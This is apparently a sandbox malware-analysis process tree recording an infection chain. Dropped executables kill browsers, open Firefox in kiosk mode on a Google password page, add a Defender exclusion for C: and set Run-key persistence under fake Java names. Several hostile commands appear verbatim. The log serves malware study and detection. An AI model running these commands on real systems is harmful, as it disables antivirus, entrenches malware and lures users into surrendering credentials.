- Uses browser remote debugging
PID:4816
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4436,i,9514024906106689169,18339160876125645351,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4420 /prefetch:18⤵
- Uses browser remote debugging
PID:2912
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5164,i,9514024906106689169,18339160876125645351,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5176 /prefetch:88⤵PID:5616
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""7⤵
- Uses browser remote debugging
PID:4752
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x2f4,0x7ffe3918f208,0x7ffe3918f214,0x7ffe3918f2208⤵PID:3532
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1916,i,4114381483003402176,11257228510215602731,262144 --variations-seed-version --mojo-platform-channel-handle=2228 /prefetch:38⤵PID:4476
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2200,i,4114381483003402176,11257228510215602731,262144 --variations-seed-version --mojo-platform-channel-handle=2196 /prefetch:28⤵PID:1008
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1784,i,4114381483003402176,11257228510215602731,262144 --variations-seed-version --mojo-platform-channel-handle=2848 /prefetch:88⤵PID:4948
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3444,i,4114381483003402176,11257228510215602731,262144 --variations-seed-version --mojo-platform-channel-handle=3492 /prefetch:18⤵
- Uses browser remote debugging
PID:5404
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3452,i,4114381483003402176,11257228510215602731,262144 --variations-seed-version --mojo-platform-channel-handle=3540 /prefetch:18⤵
- Uses browser remote debugging
PID:2156
C:\Users\Admin\AppData\Local\Temp\10367970101\223af68ec4.exe"C:\Users\Admin\AppData\Local\Temp\10367970101\223af68ec4.exe"6⤵PID:2516
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- Kills process with taskkill
PID:5824
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- Kills process with taskkill
PID:4704
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- Kills process with taskkill
PID:4452
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- Kills process with taskkill
PID:5784
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- Kills process with taskkill
PID:3800
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:3908
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵PID:5432
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2000 -prefsLen 27099 -prefMapHandle 2004 -prefMapSize 270279 -ipcHandle 2092 -initialChannelId {13c6aa80-cac2-4812-b1af-f48dd7a76ff2} -parentPid 5432 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5432" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu9⤵PID:2160
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2484 -prefsLen 27135 -prefMapHandle 2488 -prefMapSize 270279 -ipcHandle 2496 -initialChannelId {dac790be-94d6-4522-b2cc-0a8fde17444c} -parentPid 5432 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5432" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket9⤵PID:5764
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3628 -prefsLen 25213 -prefMapHandle 3632 -prefMapSize 270279 -jsInitHandle 3636 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3840 -initialChannelId {a331c2e8-b438-4df9-9d3d-6d2ba26cd378} -parentPid 5432 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5432" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab9⤵PID:3908
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4080 -prefsLen 27325 -prefMapHandle 4084 -prefMapSize 270279 -ipcHandle 4172 -initialChannelId {e67dfa48-ecee-4eee-81fe-1e70a124b4e8} -parentPid 5432 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5432" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd9⤵PID:6016
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3116 -prefsLen 34824 -prefMapHandle 3120 -prefMapSize 270279 -jsInitHandle 1380 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 1660 -initialChannelId {c2da3d62-a1cd-433a-ab6d-cf78fffa4232} -parentPid 5432 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5432" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab9⤵PID:6300
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5040 -prefsLen 34959 -prefMapHandle 5000 -prefMapSize 270279 -ipcHandle 2520 -initialChannelId {5c4175a2-b3aa-4a26-b090-8080309b85fc} -parentPid 5432 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5432" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility9⤵PID:7804
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2980 -prefsLen 32900 -prefMapHandle 2740 -prefMapSize 270279 -jsInitHandle 5072 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5084 -initialChannelId {365db42f-d267-4362-bb20-9d5eb6911aaf} -parentPid 5432 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5432" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab9⤵PID:7852
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5100 -prefsLen 32900 -prefMapHandle 5104 -prefMapSize 270279 -jsInitHandle 5108 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5116 -initialChannelId {7762d5ec-7f85-4b65-9270-ba3bcb094d41} -parentPid 5432 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5432" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab9⤵PID:7864
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5504 -prefsLen 32952 -prefMapHandle 5508 -prefMapSize 270279 -jsInitHandle 5512 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5516 -initialChannelId {288036bf-7f26-44fc-a010-10dcec185dda} -parentPid 5432 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5432" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab9⤵PID:7900
C:\Users\Admin\AppData\Local\Temp\10367980101\2472d5ad66.exe"C:\Users\Admin\AppData\Local\Temp\10367980101\2472d5ad66.exe"6⤵PID:2528
C:\Users\Admin\AppData\Local\Temp\10367990101\e29c3b8ad3.exe"C:\Users\Admin\AppData\Local\Temp\10367990101\e29c3b8ad3.exe"6⤵PID:7280
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10367990101\e29c3b8ad3.exe"7⤵PID:7004
C:\Users\Admin\AppData\Local\Temp\10368000101\53ec6f7213.exe"C:\Users\Admin\AppData\Local\Temp\10368000101\53ec6f7213.exe"6⤵PID:8076
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10368000101\53ec6f7213.exe"7⤵PID:19112
C:\Users\Admin\AppData\Local\Temp\10368010101\3065a77778.exe"C:\Users\Admin\AppData\Local\Temp\10368010101\3065a77778.exe"6⤵PID:24428
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:19316
C:\Users\Admin\AppData\Local\Temp\10368020101\TbV75ZR.exe"C:\Users\Admin\AppData\Local\Temp\10368020101\TbV75ZR.exe"6⤵PID:24876
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:24920
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 24920 -s 4968⤵
- Program crash
PID:25352
C:\Users\Admin\AppData\Local\Temp\10368030101\u75a1_003.exe"C:\Users\Admin\AppData\Local\Temp\10368030101\u75a1_003.exe"6⤵PID:3856
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'7⤵PID:25852
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'8⤵
- Command and Scripting Interpreter: PowerShell
PID:25264
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵PID:25860
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""8⤵PID:12348
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Remove-MpPreference -ExclusionPath C:\9⤵PID:10884
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""8⤵PID:27128
C:\Users\Admin\AppData\Local\Temp\10368040101\d75dbfaf10.exe"C:\Users\Admin\AppData\Local\Temp\10368040101\d75dbfaf10.exe"6⤵PID:19684
C:\Users\Admin\AppData\Local\Temp\10368050101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10368050101\7IIl2eE.exe"6⤵PID:16808
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat7⤵PID:26876
C:\Users\Admin\AppData\Local\Temp\10368060101\Rm3cVPI.exe"C:\Users\Admin\AppData\Local\Temp\10368060101\Rm3cVPI.exe"6⤵PID:7664
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10368081121\2GF9eeb.cmd"6⤵PID:23560
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10368081121\2GF9eeb.cmd"7⤵PID:23716
C:\Users\Admin\AppData\Local\Temp\10368090101\hYjiwV0.exe"C:\Users\Admin\AppData\Local\Temp\10368090101\hYjiwV0.exe"6⤵PID:4172
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:26312
C:\Users\Admin\AppData\Local\Temp\10368100101\hYjiwV0.exe"C:\Users\Admin\AppData\Local\Temp\10368100101\hYjiwV0.exe"6⤵PID:18312
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:24256
C:\Users\Admin\AppData\Local\Temp\10368110101\d950b77f9b.exe"C:\Users\Admin\AppData\Local\Temp\10368110101\d950b77f9b.exe"6⤵PID:19344
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:424
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:4320
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:1748
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:3588
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵PID:2648
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exeC:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe1⤵PID:5896
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:4008
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe"1⤵PID:3144
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe2⤵PID:6244
C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe3⤵PID:7284
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe4⤵PID:7224
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe5⤵PID:7432
C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe6⤵PID:7588
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe7⤵PID:2212
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe8⤵PID:7640
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe9⤵PID:7532
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe10⤵PID:116
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe11⤵PID:1588
C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe12⤵PID:4936
C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe13⤵PID:18644
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe14⤵PID:18752
C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe15⤵PID:18812
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe16⤵PID:18876
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe17⤵PID:19036
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe18⤵PID:24540
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe19⤵PID:19132
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe20⤵PID:19340
C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe21⤵PID:3232
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javasupport.exe"22⤵
- Modifies registry key
PID:19504
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javasupport.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe\"'"22⤵
- Command and Scripting Interpreter: PowerShell
PID:20216
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\mM4zRoPf\sHmUQoFG1f5KA3vK.exe1⤵PID:7784
C:\Users\Admin\AppData\Local\Temp\mM4zRoPf\sHmUQoFG1f5KA3vK.exeC:\Users\Admin\AppData\Local\Temp\mM4zRoPf\sHmUQoFG1f5KA3vK.exe2⤵PID:18884
C:\Users\Admin\AppData\Local\Temp\JY8NyBKE\f14tGmc1aTUQtaAz.exeC:\Users\Admin\AppData\Local\Temp\JY8NyBKE\f14tGmc1aTUQtaAz.exe 188843⤵PID:18916
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 18916 -s 6844⤵
- Program crash
PID:24892
C:\Users\Admin\AppData\Local\Temp\mM4zRoPf\CJZmu1lwMKZVNG3o.exeC:\Users\Admin\AppData\Local\Temp\mM4zRoPf\CJZmu1lwMKZVNG3o.exe 188843⤵PID:17156
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 17156 -s 4764⤵
- Program crash
PID:11928
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2528 -ip 25281⤵PID:18668
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3052 -ip 30521⤵PID:18688
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 18916 -ip 189161⤵PID:24804
C:\Windows\SysWOW64\fontdrvhost.exe"C:\Windows\System32\fontdrvhost.exe"1⤵PID:25164
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 24920 -ip 249201⤵PID:25204
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:25564
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe"1⤵PID:25348
C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe2⤵PID:26044
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe3⤵PID:26332
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe4⤵PID:25604
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe5⤵PID:26068
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe6⤵PID:25260
C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe7⤵PID:25632
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe8⤵PID:25524
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe9⤵PID:25872
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe10⤵PID:26200
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe11⤵PID:25876
C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exeC:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe12⤵PID:25556
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe13⤵PID:26248
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe14⤵PID:25924
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe15⤵PID:25728
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe16⤵PID:7076
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaservice_service.exe"17⤵
- Modifies registry key
PID:26964
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaservice_service.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe\"'"17⤵
- Command and Scripting Interpreter: PowerShell
PID:17908
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:26588
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:26596
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:26148
C:\Windows\system32\regsvr32.EXEC:\Windows\system32\regsvr32.EXE /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\1wlanapi.ocx"1⤵PID:26948
C:\Windows\SysWOW64\regsvr32.exe/s /i:INSTALL "C:\Users\Admin\AppData\Roaming\1wlanapi.ocx"2⤵PID:23840
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵PID:17824
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exeC:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe1⤵PID:17744
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe"1⤵PID:16972
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe2⤵PID:11952
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe3⤵PID:23268
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe4⤵PID:21068
C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exeC:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe5⤵PID:21008
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe6⤵PID:23764
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe7⤵PID:24088
C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe8⤵PID:19008
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe9⤵PID:23956
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe10⤵PID:20992
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe11⤵PID:19312
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe12⤵PID:24060
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe13⤵PID:23668
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe14⤵PID:23876
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe15⤵PID:22460
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe16⤵PID:19392
C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe17⤵PID:22660
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe18⤵PID:4936
C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe19⤵PID:24040
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe20⤵PID:20108
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe21⤵PID:19668
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe22⤵PID:19356
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe23⤵PID:19544
